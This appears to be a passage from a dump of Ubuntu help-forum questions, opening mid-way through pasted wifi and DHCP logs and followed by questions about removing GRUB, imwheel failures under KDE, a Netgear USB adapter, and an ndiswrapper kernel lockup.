down may 3 20:28:27 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : disconnected - > unavailable ( reason 'supplicant-failed ' ) [ 30 20 10 ] may 3 20:28:27 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : deactivating device ( reason 'supplicant-failed ' ) [ 10 ] may 3 20:28:27 bell dbus [ 556 ] : [ system ] activating service name='fi.w1.wpa_supplicant1 ' ( using servicehelper ) may 3 20:28:27 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:28:27 bell dbus [ 556 ] : [ system ] successfully activated service 'fi.w1.wpa_supplicant1' may 3 20:28:27 bell networkmanager [ 1301 ] : < info > wpa_supplicant started may 3 20:28:28 bell wpa_supplicant [ 4930 ] : successfully initialized wpa_supplicant may 3 20:28:28 bell wpa_supplicant [ 4937 ] : nl80211 : 'nl80211 ' generic netlink not found may 3 20:28:28 bell wpa_supplicant [ 4937 ] : failed to initialize driver 'nl80211' may 3 20:28:28 bell kernel : [ 1869.701065 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:28:28 bell dhclient : internet systems consortium dhcp client 4.2.4 may 3 20:28:28 bell dhclient : copyright 2004-2012 internet systems consortium . may 3 20:28:28 bell dhclient : all rights reserved . may 3 20:28:28 bell dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 3 20:28:28 bell dhclient : may 3 20:28:28 bell dhclient : listening on lpf/p2p1/04:7d:7b:21:3f : cd may 3 20:28:28 bell dhclient : sending on lpf/p2p1/04:7d:7b:21:3f : cd may 3 20:28:28 bell dhclient : sending on socket/fallback may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] may 3 20:28:28 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:28:28 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:28:28 bell wpa_supplicant [ 4937 ] : wlan0 : reject scan trigger since one is already pending may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : ready - > disconnected may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell dhclient : dhcprelease on p2p1 to 192.168.0.1 port 67 ( xid=0x20941599 ) may 3 20:28:28 bell avahi-daemon [ 651 ] : withdrawing address record for 192.168.0.45 on p2p1 . may 3 20:28:28 bell avahi-daemon [ 651 ] : leaving mdns multicast group on interface p2p1.ipv4 with address 192.168.0.45 . may 3 20:28:28 bell avahi-daemon [ 651 ] : interface p2p1.ipv4 no longer relevant for mdns . may 3 20:28:28 bell avahi-daemon [ 651 ] : interface p2p1.ipv6 no longer relevant for mdns . may 3 20:28:28 bell avahi-daemon [ 651 ] : leaving mdns multicast group on interface p2p1.ipv6 with address fe80 : :67d:7bff : fe21:3fcd . may 3 20:28:28 bell avahi-daemon [ 651 ] : withdrawing address record for fe80 : :67d:7bff : fe21:3fcd on p2p1 . may 3 20:28:28 bell kernel : [ 1870.194760 ] r8169 0000:01:00.0 p2p1 : link down may 3 20:28:28 bell kernel : [ 1870.194818 ] r8169 0000:01:00.0 p2p1 : link down may 3 20:28:28 bell kernel : [ 1870.194907 ] ipv6 : addrconf ( netdev_up ) : p2p1 : link is not ready may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > disabled may 3 20:28:28 bell dhclient : internet systems consortium dhcp client 4.2.4 may 3 20:28:28 bell dhclient : copyright 2004-2012 internet systems consortium . may 3 20:28:28 bell dhclient : all rights reserved . may 3 20:28:28 bell dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 3 20:28:28 bell dhclient : may 3 20:28:28 bell dhclient : listening on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:28:28 bell dhclient : sending on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:28:28 bell dhclient : sending on socket/fallback may 3 20:28:28 bell kernel : [ 1870.439315 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:28:28 bell wpa_supplicant [ 4937 ] : wlan0 : reject scan trigger since one is already pending may 3 20:28:28 bell wpa_supplicant [ 4937 ] : wlan0 : failed to initiate ap scan may 3 20:28:28 bell wpa_supplicant [ 4937 ] : wlan0 : ctrl-event-terminating may 3 20:28:28 bell networkmanager [ 1301 ] : < info > wpa_supplicant stopped may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disabled - > down may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : disconnected - > unavailable ( reason 'supplicant-failed ' ) [ 30 20 10 ] may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : deactivating device ( reason 'supplicant-failed ' ) [ 10 ] may 3 20:28:28 bell dbus [ 556 ] : [ system ] activating service name='fi.w1.wpa_supplicant1 ' ( using servicehelper ) may 3 20:28:28 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:28:28 bell kernel : [ 1870.498360 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:28:28 bell dbus [ 556 ] : [ system ] successfully activated service 'fi.w1.wpa_supplicant1' may 3 20:28:28 bell networkmanager [ 1301 ] : < info > wpa_supplicant started may 3 20:28:28 bell wpa_supplicant [ 5005 ] : successfully initialized wpa_supplicant may 3 20:28:28 bell wpa_supplicant [ 5006 ] : nl80211 : 'nl80211 ' generic netlink not found may 3 20:28:28 bell wpa_supplicant [ 5006 ] : failed to initialize driver 'nl80211' may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] may 3 20:28:28 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:28:28 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : ready - > disconnected may 3 20:28:28 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:28:28 bell wpa_supplicant [ 5006 ] : wlan0 : reject scan trigger since one is already pending may 3 20:28:30 bell kernel : [ 1871.782264 ] r8169 0000:01:00.0 p2p1 : link up may 3 20:28:30 bell kernel : [ 1871.782306 ] ipv6 : addrconf ( netdev_change ) : p2p1 : link becomes ready may 3 20:28:31 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > disabled may 3 20:28:31 bell avahi-daemon [ 651 ] : joining mdns multicast group on interface p2p1.ipv6 with address fe80 : :67d:7bff : fe21:3fcd . may 3 20:28:31 bell avahi-daemon [ 651 ] : new relevant interface p2p1.ipv6 for mdns . may 3 20:28:31 bell avahi-daemon [ 651 ] : registering new address record for fe80 : :67d:7bff : fe21:3fcd on p2p1.* . may 3 20:28:38 bell networkmanager [ 1301 ] : < info > wpa_supplicant die count reset may 3 20:29:06 bell dhclient : internet systems consortium dhcp client 4.2.4 may 3 20:29:06 bell dhclient : copyright 2004-2012 internet systems consortium . may 3 20:29:06 bell dhclient : all rights reserved . may 3 20:29:06 bell dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 3 20:29:06 bell dhclient : may 3 20:29:06 bell dhclient : listening on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:29:06 bell dhclient : sending on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:29:06 bell dhclient : sending on socket/fallback may 3 20:29:06 bell kernel : [ 1908.514481 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:29:06 bell kernel : [ 1908.546806 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:29:06 bell wpa_supplicant [ 5006 ] : message repeated 2 times : [ wlan0 : reject scan trigger since one is already pending ] may 3 20:29:06 bell wpa_supplicant [ 5006 ] : wlan0 : failed to initiate ap scan may 3 20:29:06 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disabled - > disconnected may 3 20:29:06 bell wpa_supplicant [ 5006 ] : wlan0 : ctrl-event-terminating may 3 20:29:06 bell networkmanager [ 1301 ] : < info > wpa_supplicant stopped may 3 20:29:06 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > down may 3 20:29:06 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : disconnected - > unavailable ( reason 'supplicant-failed ' ) [ 30 20 10 ] may 3 20:29:06 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : deactivating device ( reason 'supplicant-failed ' ) [ 10 ] may 3 20:29:06 bell dbus [ 556 ] : [ system ] activating service name='fi.w1.wpa_supplicant1 ' ( using servicehelper ) may 3 20:29:06 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:29:06 bell dbus [ 556 ] : [ system ] successfully activated service 'fi.w1.wpa_supplicant1' may 3 20:29:06 bell networkmanager [ 1301 ] : < info > wpa_supplicant started may 3 20:29:06 bell dhclient : internet systems consortium dhcp client 4.2.4 may 3 20:29:06 bell dhclient : copyright 2004-2012 internet systems consortium . may 3 20:29:06 bell dhclient : all rights reserved . may 3 20:29:06 bell dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 3 20:29:06 bell dhclient : may 3 20:29:06 bell wpa_supplicant [ 5098 ] : successfully initialized wpa_supplicant may 3 20:29:06 bell wpa_supplicant [ 5100 ] : nl80211 : 'nl80211 ' generic netlink not found may 3 20:29:06 bell wpa_supplicant [ 5100 ] : failed to initialize driver 'nl80211' may 3 20:29:07 bell kernel : [ 1908.710778 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:29:07 bell dhclient : listening on lpf/p2p1/04:7d:7b:21:3f : cd may 3 20:29:07 bell dhclient : sending on lpf/p2p1/04:7d:7b:21:3f : cd may 3 20:29:07 bell dhclient : sending on socket/fallback may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:29:07 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:29:07 bell dhclient : dhcprelease on p2p1 to 192.168.0.1 port 67 ( xid=0x1aaf8d08 ) may 3 20:29:07 bell dhclient : send_packet : network is unreachable may 3 20:29:07 bell dhclient : send_packet : please consult readme file regarding broadcast address . may 3 20:29:07 bell dhclient : dhclient.c:2365 : failed to send 300 byte long packet over fallback interface . may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] may 3 20:29:07 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:29:07 bell networkmanager [ 1301 ] : < warn > trying to remove a non-existant call id . may 3 20:29:07 bell wpa_supplicant [ 5100 ] : wlan0 : reject scan trigger since one is already pending may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : ready - > disconnected may 3 20:29:07 bell networkmanager [ 1301 ] : < info > ( wlan0 ) supports 1 scan ssids may 3 20:29:07 bell avahi-daemon [ 651 ] : interface p2p1.ipv6 no longer relevant for mdns . may 3 20:29:07 bell avahi-daemon [ 651 ] : leaving mdns multicast group on interface p2p1.ipv6 with address fe80 : :67d:7bff : fe21:3fcd . may 3 20:29:07 bell avahi-daemon [ 651 ] : withdrawing address record for fe80 : :67d:7bff : fe21:3fcd on p2p1 . may 3 20:29:07 bell kernel : [ 1909.094908 ] r8169 0000:01:00.0 p2p1 : link down may 3 20:29:07 bell kernel : [ 1909.094953 ] r8169 0000:01:00.0 p2p1 : link down may 3 20:29:07 bell kernel : [ 1909.095303 ] ipv6 : addrconf ( netdev_up ) : p2p1 : link is not ready may 3 20:29:08 bell kernel : [ 1910.650767 ] r8169 0000:01:00.0 p2p1 : link up may 3 20:29:08 bell kernel : [ 1910.650808 ] ipv6 : addrconf ( netdev_change ) : p2p1 : link becomes ready may 3 20:29:10 bell avahi-daemon [ 651 ] : joining mdns multicast group on interface p2p1.ipv6 with address fe80 : :67d:7bff : fe21:3fcd . may 3 20:29:10 bell avahi-daemon [ 651 ] : new relevant interface p2p1.ipv6 for mdns . may 3 20:29:10 bell avahi-daemon [ 651 ] : registering new address record for fe80 : :67d:7bff : fe21:3fcd on p2p1.* . may 3 20:29:17 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > inactive may 3 20:29:17 bell networkmanager [ 1301 ] : < info > wpa_supplicant die count reset may 3 20:34:05 bell dhclient : dhcpdiscover on p2p1 to 255.255.255.255 port 67 interval 3 ( xid=0x1ce727d7 ) may 3 20:34:06 bell dhclient : dhcprequest of 192.168.0.45 on p2p1 to 255.255.255.255 port 67 ( xid=0x1ce727d7 ) may 3 20:34:06 bell dhclient : dhcpoffer of 192.168.0.45 from 192.168.0.1 may 3 20:34:06 bell dhclient : dhcpack of 192.168.0.45 from 192.168.0.1 may 3 20:34:06 bell avahi-daemon [ 651 ] : joining mdns multicast group on interface p2p1.ipv4 with address 192.168.0.45 . may 3 20:34:06 bell avahi-daemon [ 651 ] : new relevant interface p2p1.ipv4 for mdns . may 3 20:34:06 bell avahi-daemon [ 651 ] : registering new address record for 192.168.0.45 on p2p1.ipv4 . may 3 20:34:08 bell dhclient : bound to 192.168.0.45 -- renewal in 339626 seconds . may 3 20:36:41 bell rtkit-daemon [ 1789 ] : successfully made thread 5527 of process 5527 ( n/a ) owned by '1000 ' high priority at nice level -11 . may 3 20:36:41 bell rtkit-daemon [ 1789 ] : supervising 1 threads of 1 processes of 1 users . may 3 20:36:41 bell rtkit-daemon [ 1789 ] : successfully made thread 5528 of process 5527 ( n/a ) owned by '1000 ' rt at priority 5 . may 3 20:36:41 bell rtkit-daemon [ 1789 ] : supervising 2 threads of 1 processes of 1 users . may 3 20:36:41 bell rtkit-daemon [ 1789 ] : successfully made thread 5529 of process 5527 ( n/a ) owned by '1000 ' rt at priority 5 . my second test was using the external driver ( closed source , sta ? ) : > lsmod | grep wl wl 3999690 0 lib80211 14040 2 wl , lib80211_crypt_tkip cfg80211 409394 1 wl > modinfo wl filename : /lib/modules/3.13.0-24-generic/updates/dkms/wl.ko license : mixed/proprietary srcversion : ff25fe784dc6bdff69dafcb alias : pci : v*d*sv*sd*bc02sc80i* depends : cfg80211 , lib80211 vermagic : 3.13.0-24-generic smp mod_unload modversions 686 parm : wl_txq_thresh : int parm : oneonly : int parm : piomode : int parm : instance_base : int parm : nompc : int parm : intf_name : string > dmesg [ 348.676644 ] systemd-hostnamed [ 3372 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 391.527312 ] perf samples too long ( 2518 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 517.280745 ] cfg80211 : calling crda to update world regulatory domain [ 517.293755 ] lib80211 : common routines for ieee802.11 drivers [ 517.293764 ] lib80211_crypt : registered algorithm 'null' [ 517.352703 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 517.372861 ] lib80211_crypt : registered algorithm 'tkip' [ 517.510968 ] wlan0 : broadcom bcm4727 802.11 hybrid wireless controller 6.30.223.141 ( r415941 ) [ 518.733753 ] cfg80211 : world regulatory domain updated : [ 518.733767 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 518.733774 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 518.733779 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 518.733784 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 518.733789 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 518.733795 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) > less /var/log/syslog http : //pastebin.com/9m0pwlwq ( limit exceeded here ) > less /var/log/wicd/wicd.log 2014/05/03 22:12:32 : : connecting to wireless network fritzoa 2014/05/03 22:12:32 : : attempting to set hostname with dhclient 2014/05/03 22:12:32 : : using dhcpcd or another supported client may work better 2014/05/03 22:12:32 : : attempting to set hostname with dhclient 2014/05/03 22:12:32 : : using dhcpcd or another supported client may work better 2014/05/03 22:12:33 : : putting interface down 2014/05/03 22:12:33 : : releasing dhcp leases ... 2014/05/03 22:12:33 : : attempting to set hostname with dhclient 2014/05/03 22:12:33 : : using dhcpcd or another supported client may work better 2014/05/03 22:12:33 : : setting false ip ... 2014/05/03 22:12:33 : : stopping wpa_supplicant 2014/05/03 22:12:33 : : flushing the routing table ... 2014/05/03 22:12:33 : : putting interface up ... 2014/05/03 22:12:35 : : generating psk ... 2014/05/03 22:12:35 : : attempting to authenticate ... 2014/05/03 22:13:11 : : wpa_supplicant authentication may have failed . 2014/05/03 22:13:11 : : connect result is failed 2014/05/03 22:13:11 : : exiting connection thread 2014/05/03 22:13:11 : : sending connection attempt result bad_pass 2014/05/03 22:13:11 : : attempting to set hostname with dhclient 2014/05/03 22:13:11 : : using dhcpcd or another supported client may work better 2014/05/03 22:13:12 : : attempting to set hostname with dhclient 2014/05/03 22:13:12 : : using dhcpcd or another supported client may work better connect unencrypted / unsecured accesspoint , android tethering hotspot > less /var/log/syslog http : //pastebin.com/mhdyf51w ( too big ) > less /var/log/wicd/wicd.log 2014/05/03 22:22:32 : : connecting to wireless network androidap 2014/05/03 22:22:32 : : attempting to set hostname with dhclient 2014/05/03 22:22:32 : : using dhcpcd or another supported client may work better 2014/05/03 22:22:32 : : attempting to set hostname with dhclient 2014/05/03 22:22:32 : : using dhcpcd or another supported client may work better 2014/05/03 22:22:33 : : putting interface down 2014/05/03 22:22:33 : : releasing dhcp leases ... 2014/05/03 22:22:33 : : attempting to set hostname with dhclient 2014/05/03 22:22:33 : : using dhcpcd or another supported client may work better 2014/05/03 22:22:33 : : setting false ip ... 2014/05/03 22:22:33 : : stopping wpa_supplicant 2014/05/03 22:22:33 : : flushing the routing table ... 2014/05/03 22:22:33 : : putting interface up ... 2014/05/03 22:22:35 : : running dhcp with hostname bell 2014/05/03 22:22:35 : : attempting to set hostname with dhclient 2014/05/03 22:22:35 : : using dhcpcd or another supported client may work better 2014/05/03 22:22:35 : : internet systems consortium dhcp client 4.2.4 2014/05/03 22:22:35 : : copyright 2004-2012 internet systems consortium . 2014/05/03 22:22:35 : : all rights reserved . 2014/05/03 22:22:35 : : for info , please visit https : //www.isc.org/software/dhcp/ 2014/05/03 22:22:35 : : 2014/05/03 22:22:35 : : listening on lpf/wlan0/7c : e9 : d3:12:2b : e6 2014/05/03 22:22:35 : : sending on lpf/wlan0/7c : e9 : d3:12:2b : e6 2014/05/03 22:22:35 : : sending on socket/fallback 2014/05/03 22:22:35 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 ( xid=0x4b6721af ) 2014/05/03 22:22:38 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 4 ( xid=0x4b6721af ) 2014/05/03 22:22:42 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 8 ( xid=0x4b6721af ) 2014/05/03 22:22:50 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 13 ( xid=0x4b6721af ) 2014/05/03 22:23:03 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 19 ( xid=0x4b6721af ) 2014/05/03 22:23:22 : : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 19 ( xid=0x4b6721af )
460269	how to remove grub from pre-installed windows 8	i 've tried doing the /fixboot and /fixmbr commands in command from a windows recovery disc but grub is still present upon boot up . i 'm currently dual booting windows 8 and ubuntu 12.04 and my laptop did ship with uefi . how can i restore the default bootloader for windows and remove grub and ubuntu entirely ? edit : easybcd displays the path to where the bootloaders are located including grub : entry # 1 name : ubuntu bcd id : { ec848a5b-8949-11e3-944c-806e6f6e6963 } device : \device\harddiskvolume1 bootloader path : \efi\ubuntu\shimx64.efi entry # 2 name : ubuntu bcd id : { ec848a5c-8949-11e3-944c-806e6f6e6963 } device : \device\harddiskvolume1 bootloader path : efi\ubuntu\grubx64.efi entry # 3 name : windows 8 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.efi would deleting the grub files in efi/ubuntu/ remove grub and load the windows bootloader by default ?
460271	imwheel defunct on dialog popup in front	in kubuntu 14.04 ( kde 4.13.0 ) , i use imwheel 1.0.0pre12-9 to map the extra thumb-buttons of my logitech m510 to some useful keystrokes for certain programs . this works fine , it will start nicely when my computer switches on and it will even survive suspend to ram . problem is , imwheel often halts , when tv-browser.org pops up an automatic notification . i configured those notifications in kwin to always show on top and also enabled the focus steeling prevention . also tvb is not the only program to kill imwheel . if i have n't moved the mouse for a few seconds , imwheel will survive a tvb notification . if i 'm actively using the mouse ( scrolling/left-clicking/dragging ) the moment , one of those popups appears , the extra-mappings of imwheel are defunct thereafter . i ran imwheel from the console : no errors get displayed . the process of imwheel is still hanging around , but does n't do anything anymore . it happens about once every hour , so i pretty much can not rely on the thumb button currently issuing the command , i programmed it to or issuing e.g . a back in firefox per default-configuration bypassing imwheel . my questions : anybody else ever suffered this problem ? how and where to get help on this complex scenario ? shall i report a bug against kwin ? in launchpad or upstream at kde ? who is maintaining imwheel ? there is only an outdated http : //imwheel.sf.net from 2004 can you recommend a more up to date alternate software for mapping mouse-thumb-buttons to key-strokes in kubuntu / kde ? thanks for your time and advice edit : found more ways to kill imwheel almost reliably . in firefox , when i save a small download / an image to my harddrive there is an animation of the green arrow icon . if i click my thumb-button ( supposed to close the current tab by ctrl+w ) within two seconds of that animation , the tab wo n't close and imwheel is defunct everywhere ( also in other programs/windows ) after switching windows or desktops i have some fancy 3d effects enabled . if i 'm too fast clicking one of the thumb-buttons right after such an animation , imwheel gets defunct to . as a wild guess i 'd say , imwheel somehow tries to deliver it 's derived key-events that translated from the thumb-button-presses , to some graphic overlay , which is not a full fledged window itself and certainly not supposed to ever gain keyboard-focus . finally i found `` imwheel -- kill '' to be way faster for reactivating it ( instead of logging out and in again ) . i even mapped that to a global keyboard shortcut . edit2 : debug shows , imwheel is ungrabbing buttons 4 to 9 and then waits eternally , never grabbing them again . only a restart with -k can bring it back . the easiest scenario is to send a mapped thumb button to a configured window , which is in the background and does not have the focus . debug output shows , imwheel testing against the window which has the focus , not respecting the mouse position over the other window . none of the ordinary rules apply to this window , but i made an exclude rule at the end of ~/.imwheelrc like this : '' . * '' @ priority=-1000 @ exclude matching every window . removing/commenting this final exclude rule solves my problem . imwheel wo n't crash anymore .
460277	how to get netgear a6200 to work on 14.04	i bought the netgear a6200 usb wireless adapter , and i used wine to run the installer from the disk that came with the adapter , but it failed part way through . is there any way to get this to work ?
460279	ndiswrapper locks system when disconnecting from wifi network	after some hours of fiddling with ndiswrapper i have successfully managed to connect to my wireless network with my network card which sports a realtek rtl8190 chipset . i 'm using ubuntu 14.04 and the win xp 64bit driver which came with the network card . however when trying to disconnect from the wifi network or shutting down the system , the system gets locked by ndiswrapper . system log : may 3 23:14:37 saturnv kernel : [ 232.556371 ] bug : soft lockup - cpu # 6 stuck for 22s ! [ kworker/u16:7:189 ] may 3 23:14:37 saturnv kernel : [ 232.556382 ] modules linked in : nls_utf8 isofs cfg80211 rfcomm bnep bluetooth parport_pc ppdev snd_hda_codec_ca0132 hid_microsoft hid_generic joydev xpad ff_memless rndis_host usbhid cdc_ether hid usbnet snd_hda_codec_hdmi mxm_wmi x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm snd_hda_codec_realtek crct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel snd_hda_codec snd_hwdep aesni_intel snd_pcm aes_x86_64 lrw gf128mul snd_page_alloc glue_helper ablk_helper snd_seq_midi cryptd snd_seq_midi_event snd_rawmidi snd_seq nvidia ( pof ) psmouse snd_seq_device snd_timer serio_raw snd drm lpc_ich shpchp soundcore wmi mei_me mei video mac_hid ndiswrapper ( of ) lp parport ahci r8169 libahci mii may 3 23:14:37 saturnv kernel : [ 232.556494 ] cpu : 6 pid : 189 comm : kworker/u16:7 tainted : pf d io 3.13.0-24-generic # 46-ubuntu may 3 23:14:37 saturnv kernel : [ 232.556498 ] hardware name : ect /z87-g43 ( ms-7816 ) , bios v1.3 06/06/2013 may 3 23:14:37 saturnv kernel : [ 232.556529 ] workqueue : ntos_wq kdpc_worker [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556535 ] task : ffff88040427afe0 ti : ffff880404272000 task.ti : ffff880404272000 may 3 23:14:37 saturnv kernel : [ 232.556539 ] rip : 0010 : [ < ffffffffa0055ae3 > ] [ < ffffffffa0055ae3 > ] keacquirespinlockraisetodpc+0xe3/0x110 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556569 ] rsp : 0018 : ffff880404273c90 eflags : 00000202 may 3 23:14:37 saturnv kernel : [ 232.556572 ] rax : 0000000000000001 rbx : 000000000000000c rcx : 0000000000000001 may 3 23:14:37 saturnv kernel : [ 232.556576 ] rdx : 0000000000000001 rsi : ffffc90006370000 rdi : ffff88040427afe0 may 3 23:14:37 saturnv kernel : [ 232.556579 ] rbp : ffff880404273ca0 r08 : ffffc90006370000 r09 : 00000000d9888000 may 3 23:14:37 saturnv kernel : [ 232.556582 ] r10 : ffffffff8180ae00 r11 : 0000000000007516 r12 : 000000000000002e may 3 23:14:37 saturnv kernel : [ 232.556586 ] r13 : 0000000000000027 r14 : 000000000000000c r15 : 0000000000001268 may 3 23:14:37 saturnv kernel : [ 232.556590 ] fs : 0000000000000000 ( 0000 ) gs : ffff88041ed80000 ( 0000 ) knlgs:0000000000000000 may 3 23:14:37 saturnv kernel : [ 232.556594 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 may 3 23:14:37 saturnv kernel : [ 232.556598 ] cr2 : 0000000000b101e8 cr3 : 0000000001c0e000 cr4 : 00000000001407e0 may 3 23:14:37 saturnv kernel : [ 232.556601 ] stack : may 3 23:14:37 saturnv kernel : [ 232.556604 ] ffffc90006370000 ffff88003603a818 ffff880404273cc0 ffffffffa0068575 may 3 23:14:37 saturnv kernel : [ 232.556612 ] ffffc90006370000 ffffc90006370000 ffff880404273d90 ffffc900062c3e57 may 3 23:14:37 saturnv kernel : [ 232.556620 ] ffff88041ed8e360 0000000200000006 ffffc90006370000 ffffc900062e4c9c may 3 23:14:37 saturnv kernel : [ 232.556628 ] call trace : may 3 23:14:37 saturnv kernel : [ 232.556662 ] [ < ffffffffa0068575 > ] win2lin_keacquirespinlockraisetodpc_1+0x15/0x20 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556691 ] [ < ffffffffa00689f8 > ] ? win2lin_kereleasespinlock_2+0x18/0x20 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556713 ] [ < ffffffffa006a5ad > ] ? lin2win1+0xd/0x20 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556723 ] [ < ffffffff8109448b > ] ? task_rq_lock+0x4b/0x90 may 3 23:14:37 saturnv kernel : [ 232.556748 ] [ < ffffffffa0051ad1 > ] ? deserialized_irq_handler+0x21/0x40 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556778 ] [ < ffffffffa0067ebe > ] ? win2lin_deserialized_irq_handler_4+0x1e/0x30 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556804 ] [ < ffffffffa0067ea0 > ] ? win2lin_alloc_shared_memory_async_2+0x20/0x20 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556824 ] [ < ffffffffa006a613 > ] ? lin2win4+0x13/0x20 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556852 ] [ < ffffffffa0053fee > ] ? kdpc_worker+0xee/0x170 [ ndiswrapper ] may 3 23:14:37 saturnv kernel : [ 232.556862 ] [ < ffffffff810838a2 > ] ? process_one_work+0x182/0x450 may 3 23:14:37 saturnv kernel : 